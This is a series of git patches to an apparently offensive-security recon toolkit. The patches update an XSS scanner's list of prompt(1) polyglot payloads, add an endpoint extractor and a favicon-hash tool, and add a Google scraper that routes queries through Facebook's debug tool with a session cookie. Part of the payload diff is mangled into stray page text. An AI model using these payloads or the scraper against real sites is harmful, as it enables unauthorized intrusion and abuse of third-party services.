From 5873a1b601b63232233746360dd6f6a7642a661e Mon Sep 17 00:00:00 2001 From: Gwen Date: Fri, 29 May 2020 19:17:24 +0200 Subject: [PATCH 01/11] new pl --- xss.py | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/xss.py b/xss.py index eb03c80..d45f30f 100755 --- a/xss.py +++ b/xss.py @@ -296,12 +296,18 @@ def realDoTest( t_params ): # source: https://twitter.com/brutelogic/status/1138805808328839170 if not n_payloads: t_payloads = [ - '\'"-->', + '\'"-->', '"autofocus onfocus=prompt(1)//', - '\'"-->', - "'-prompt(1)-'", + '\'"-->.', + '\'"-->', + '\'"-->', + '"-prompt(1)-"', "\\'-prompt(1)//", - 'javascript:prompt(1)', + "'\")];*/prompt(1);/*", + '" onload=prompt(1)>', + '\'"-->Buy Me A Coffee +Sponsor gwen001 ### arpa.sh From f75f239e3c1bb7a164c3488ed0ba844389676cc2 Mon Sep 17 00:00:00 2001 From: Gwen Date: Fri, 26 Jun 2020 15:23:32 +0200 Subject: [PATCH 10/11] github sponsor --- .github/FUNDING.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 .github/FUNDING.yml diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 0000000..eb7b65a --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1,12 @@ +# These are supported funding model platforms + +github: [gwen001] +patreon: # Replace with a single Patreon username +open_collective: # Replace with a single Open Collective username +ko_fi: # Replace with a single Ko-fi username +tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel +community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry +liberapay: # Replace with a single Liberapay username +issuehunt: # Replace with a single IssueHunt username +otechie: # Replace with a single Otechie username +custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] From a9af5c99ccf5fa997eb7a6ac0543a7d658c6173b Mon Sep 17 00:00:00 2001 From: Gwen Date: Tue, 28 Jul 2020 08:21:38 +0200 Subject: [PATCH 11/11] fix goop regexp --- extract-endpoints.php | 62 +++++++++++++++++++++--------------------- favicon-hashtrick.py | 22 ++++++++++----- goop/__init__.py | 1 + goop/goop.py | 63 +++++++++++++++++++++++++++++++++++++++++++ quickhits.py | 2 +- 5 files changed, 112 insertions(+), 38 deletions(-) create mode 100644 goop/__init__.py create mode 100644 goop/goop.py diff --git a/extract-endpoints.php b/extract-endpoints.php index 9a54993..e82f50b 100755 --- a/extract-endpoints.php +++ b/extract-endpoints.php @@ -360,9 +360,9 @@ function usage( $err=null ) { } else { $buffer = file_get_contents( $s ); } - + ob_start(); - + if( $_mode == MODE_KEYWORD ) { $ss = escapeshellcmd( $s ); @@ -373,14 +373,14 @@ function usage( $err=null ) { echo $cmd."\n"; exec( $cmd, $output ); $n_sensitive = printColoredGrep( $_keywords_sensitive_regexp, implode("\n",$output), 1 ); - + if( $_keywords_insensitive_regexp != $_keywords_sensitive_regexp ) { $output = null; $cmd = 'egrep -i -n "'.$_keywords_insensitive_regexp.'" "'.$ss.'"'; exec( $cmd, $output ); $n_insensitive = printColoredGrep( $_keywords_insensitive_regexp, implode("\n",$output), 0 ); } - + $n_total = $n_sensitive + $n_insensitive; if( $_verbose < 2 ) { echo $n_total." keywords found!\n"; @@ -415,8 +415,8 @@ function usage( $err=null ) { clean( $t_final ); $n_final = count($t_final); $n_possible = count($t_possible); - - if( $n_final ) { + + if( $n_final ) { $t_final = array_unique( $t_final ); $n_final = count( $t_final ); foreach( $t_final as $u ) { @@ -437,14 +437,14 @@ function usage( $err=null ) { if( $_verbose < 2 ) { echo $n_final." urls found!\n"; } - + if( $n_possible && $_verbose<2 ) { Utils::_println( str_repeat('-',100), 'light_grey' ); $t_possible = array_unique( $t_possible ); Utils::_println( implode( "\n",$t_possible), 'light_grey' ); Utils::_println( $n_possible." possible...", 'light_grey' ); } - + $n_total = $n_possible + $n_final; } @@ -475,9 +475,9 @@ function testUrl( $url, $follow_location ) curl_setopt( $c, CURLOPT_FOLLOWLOCATION, $follow_location ); curl_setopt( $c, CURLOPT_RETURNTRANSFER, true ); $r = curl_exec( $c ); - + $t_info = curl_getinfo( $c ); - + return $t_info['http_code']; } @@ -488,13 +488,13 @@ function printColoredGrep( $regexp, $str, $case_sensitive ) //$l = strlen( $str ); //$m = preg_match_all( '#'.$regexp.'#i', $str, $matches, PREG_OFFSET_CAPTURE ); //var_dump( $matches ); - + if( $case_sensitive ) { $flag = ''; } else { $flag = 'i'; } - + $colored = preg_replace( '#'.$regexp.'#'.$flag, "\033[0;32m".'\\1'."\033[0m", $str, -1, $cnt ); if( $cnt ) { echo $colored."\n"; @@ -515,7 +515,7 @@ function printColoredGrep( $regexp, $str, $case_sensitive ) //break; } } - + $s3 = substr( $str, $p ); Utils::_print( $s3, 'white' );*/ return $cnt; @@ -528,7 +528,7 @@ function run( $buffer ) //var_dump( $_regexp ); $t_all = []; - + foreach( $_regexp as $r ) { $m = preg_match_all( $r.'i', $buffer, $matches ); //var_dump( $matches ); @@ -537,7 +537,7 @@ function run( $buffer ) $t_all = array_merge( $t_all, $matches[1] ); } } - + $t_exclude_extension = [ ]; $t_exclude_domain = [ ]; $t_exclude_scheme = [ 'javascript', 'mailto', 'data', 'about', 'file' ]; @@ -552,13 +552,13 @@ function run( $buffer ) { //var_dump($url); //$url = urldecode( $url ); - + $test = preg_replace( '#[^0-9a-zA-Z]#', '', $url ); if( $test == '' ) { unset( $t_all[$k] ); continue; } - + $parse = parse_url( $url ); //var_dump($parse); if( !$parse ) { @@ -566,7 +566,7 @@ function run( $buffer ) $t_possible[] = $url; continue; } - + foreach( $t_exclude_string as $s ) { if( strstr($url,$s) ) { unset( $t_all[$k] ); @@ -574,7 +574,7 @@ function run( $buffer ) continue; } } - + foreach( $t_exclude_possible as $s ) { if( strstr($url,$s) ) { unset( $t_all[$k] ); @@ -582,37 +582,37 @@ function run( $buffer ) continue; } } - + if( isset($parse['scheme']) && in_array($parse['scheme'],$t_exclude_scheme) ) { unset( $t_all[$k] ); $t_possible[] = $url; continue; } - + if( isset($parse['path']) && is_array($_ignore) && count($_ignore) ) { $p = strrpos( $parse['path'], '.' ); if( $p !== false ) { - $ext = substr( $parse['path'], $p+1 ); + $ext = substr( $parse['path'], $p+1 ); if( in_array($ext,$_ignore) ) { unset( $t_all[$k] ); continue; } } } - + if( $url[0] == '#' ) { unset( $t_all[$k] ); $t_possible[] = $url; continue; } - + if( isset($parse['path']) ) { if( strstr($parse['path'],' ') !== false ) { $tmp = explode( ' ', $parse['path'] ); $parse['path'] = $tmp[0]; } - + $kk = preg_replace('|'.$_url_chars.'|i','',$parse['path']); if( strlen($kk) != 0 ) { unset( $t_all[$k] ); @@ -621,7 +621,7 @@ function run( $buffer ) } } } - + //var_dump($t_all); return [$t_all,$t_possible]; } @@ -630,16 +630,16 @@ function run( $buffer ) function clean( &$t_urls ) { global $_scheme, $_host, $_ignore; - + $scheme = $host = ''; - + foreach( $t_urls as &$u ) { //var_dump( $u ); $scheme = $host = ''; $parse = parse_url( $u ); //var_dump( $parse ); - + if( isset($parse['host']) ) { $host = $parse['host']; } elseif( $_host ) { @@ -647,7 +647,7 @@ function clean( &$t_urls ) $u = ltrim( $u, '/' ); $u = $host . '/' . $u; } - + if( isset($parse['scheme']) && $parse['scheme'] != NULL ) { $scheme = $parse['scheme']; } elseif( $host ) { @@ -655,7 +655,7 @@ function clean( &$t_urls ) $u = ltrim( $u, '/' ); $u = $scheme . '://' . $u; } - + if( strstr($u,' ') !== false ) { $tmp = explode( ' ', $u ); $u = $tmp[0]; diff --git a/favicon-hashtrick.py b/favicon-hashtrick.py index 112b695..ce606d0 100755 --- a/favicon-hashtrick.py +++ b/favicon-hashtrick.py @@ -15,6 +15,11 @@ from colored import fg, bg, attr +# disable "InsecureRequestWarning: Unverified HTTPS request is being made." +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + def banner(): print(""" __ _ _ _ _ _ _ @@ -29,8 +34,6 @@ def banner(): """) pass -banner() - def faviconHash( data, web ): if web: @@ -53,6 +56,9 @@ def faviconHash( data, web ): parser.parse_args() args = parser.parse_args() +if not args.silent: + banner() + if args.values: t_values = args.values.split(',') else: @@ -77,10 +83,14 @@ def faviconHash( data, web ): web_src = False if args.favurl: - favsource = args.favurl - r = requests.get( favsource ) - data = r.content - web_src = True + favsource = args.favurl + try: + r = requests.get( favsource, timeout=3, verify=False ) + except Exception as e: + sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) ) + exit() + data = r.content + web_src = True if not args.favfile64 and not args.favfile and not args.favurl: parser.error( 'missing favicon' ) diff --git a/goop/__init__.py b/goop/__init__.py new file mode 100644 index 0000000..df9144c --- /dev/null +++ b/goop/__init__.py @@ -0,0 +1 @@ +__version__ = '0.1.1' diff --git a/goop/goop.py b/goop/goop.py new file mode 100644 index 0000000..e7b5463 --- /dev/null +++ b/goop/goop.py @@ -0,0 +1,63 @@ +import re +import requests + +try: + from urllib.parse import quote_plus as url_encode +except ImportError: + from urllib import quote_plus as url_encode + +def decode_html(string): + "decode common html/xml entities" + new_string = string + decoded = ['>', '<', '"', '&', '\''] + encoded = ['>', '<', '"', '&', '''] + for e, d in zip(encoded, decoded): + new_string = new_string.replace(e, d) + for e, d in zip(encoded[::-1], decoded[::-1]): + new_string = new_string.replace(e, d) + return new_string + +def parse(string): + "extract and parse resutls" + parsed = {} +# pattern = r'''
+# +#
+#
(?:(.*?)(?: ...)?
|\n.*?.*?(.*?)
)''' + pattern = r'''
''' + matches = re.finditer(pattern, string) + num = 0 + for match in matches: + # parsed[num] = {'url' : match.group(1), 'text' : match.group(2), 'summary' : match.group(3) or match.group(4)} + parsed[num] = {'url' : match.group(1), 'text' : '', 'summary' : ''} + num += 1 + return parsed + +def search(query, cookie, page=0, full=False): + """ + main function, returns parsed results + Args: + query - search string + cookie - facebook cookie + page - search result page number (optional) + """ + offset = page * 10 + filter = 1 if not full else 0 + escaped = url_encode('https://google.com/search?q=%s&start=%i&filter=%i' % (url_encode(query), offset, filter)) + headers = { + 'Host': 'developers.facebook.com', + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'deflate', + 'Connection': 'keep-alive', + 'Cookie': cookie, + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0', + 'TE': 'Trailers' + } + response = requests.get('https://developers.facebook.com/tools/debug/echo/?q=%s' % escaped, headers=headers) + cleaned_response = decode_html(response.text) + parsed = parse(cleaned_response) + return parsed diff --git a/quickhits.py b/quickhits.py index ed54682..b390019 100755 --- a/quickhits.py +++ b/quickhits.py @@ -93,7 +93,7 @@ def testURL( url ): # url = url.strip('_') match = title_regexp.search( r.text ) - title = match.group(1) if match else '-' + title = match.group(1).strip() if match else '-' ljust = 100 while ljust < len(url):